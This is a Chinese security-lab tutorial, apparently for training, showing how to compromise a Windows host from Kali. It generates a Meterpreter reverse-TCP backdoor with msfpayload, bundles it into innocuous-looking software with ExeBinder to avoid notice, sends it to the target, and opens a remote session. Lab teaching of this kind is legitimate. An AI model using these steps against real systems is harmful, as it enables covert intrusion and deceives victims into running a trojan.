• Kali渗透Windows服务器


    本文首发于“合天网安实验室”
    你是否正在收集各类网安网安知识学习,合天网安实验室为你总结了1300+网安技能任你学,点击获取免费靶场>>
    本文首发于“合天网安实验室”
    这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。
    本次实战环境:Kali渗透Windows服务器
    实战步骤一
    本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;
    1、 实战步骤一:生成setup.exe后门程序,即木马程序。
    (1) 打开kali终端,输入ifconfig, 得到本机ip为192.168.189.130。
    如下图:
     
    (2)输入以下命令,使用msfpayload生成名为setup的后门程序:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下图:
     
    (3) 进入setup.exe所在目录,修改属性:选择“允许以程序执行文件”。
    如下图所示:
     
    (4) 终端中输入首先msfconsole;然后输入use exploit/multi/handler来加载 exploit/multi/handler 模块;输入set LHOST 192.168.189.130来设置本地主机;然后输入exploit -z -j开始监听,如下图所示:
    实战步骤二
    将上面生成的木马程序与某个软件进行捆绑。
    (1)可以在windows系统下使用exe捆绑软件将setup.exe和一个其他的某个安全软件合并为一个软件,这样在运行软件时两个软件同时运行,不会引起注意。在tools里面进入名为exekunbang的文件,先打开ExeBinder.exe捆绑软件。选择第一个要合并的软件,默认选择本软件中自带的小游戏程序:
     
    点击下一步,选择第二个要捆绑的软件,即之前生成的木马程序setup.exe:
    点击下一步,选择一个文件要保存的路径:
    继续点击下一步,开始捆绑软件:
    (2) 将捆绑后的软件发送给目标主机。
    实战步骤三
    检测目标主机,对目标主机进行渗透测试。
    (2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。输入sessionss:
    可以看到目标主机的ip为192.168.189.129,
    (2)再继续输入sessions -i 1,之后可以对目标主机进行一系列的操作。如输入sysinfo可知道目标主机的系统信息;输入 getuid查看对方正在运行的用户。
     
    要养成多思考多总结的习惯,对实验结果多去分析,这样回收获更多。比如如何利用kali进行漏洞扫描;如何使用Metasploit对目标主机进行渗透测试;这些都是这次实战后可以去思考的。
    这个技术你学会了吗?加入网安实验室,1300+网安技能任你学!
     


    合天智汇:合天网络靶场、网安实战虚拟环境
  • 相关阅读:
    【Java学习笔记】I/O体系
    【Java学习笔记】几个实用类
    【Java学习笔记】内部类
    【Java学习笔记】对象的序列化和反序列化
    【Java学习笔记】数组的相关事项
    【Java学习笔记】由String str=”abc”引出的故事
    【Java学习笔记】上转型与下转型
    【Java学习笔记】枚举类型
    【Java学习笔记】集合类
    Maven的settings.xml中为HTTP和HTTPS配置代理服务器【转】
  • 原文地址:https://www.cnblogs.com/hetianlab/p/14393383.html
Copyright © 2020-2023  润新知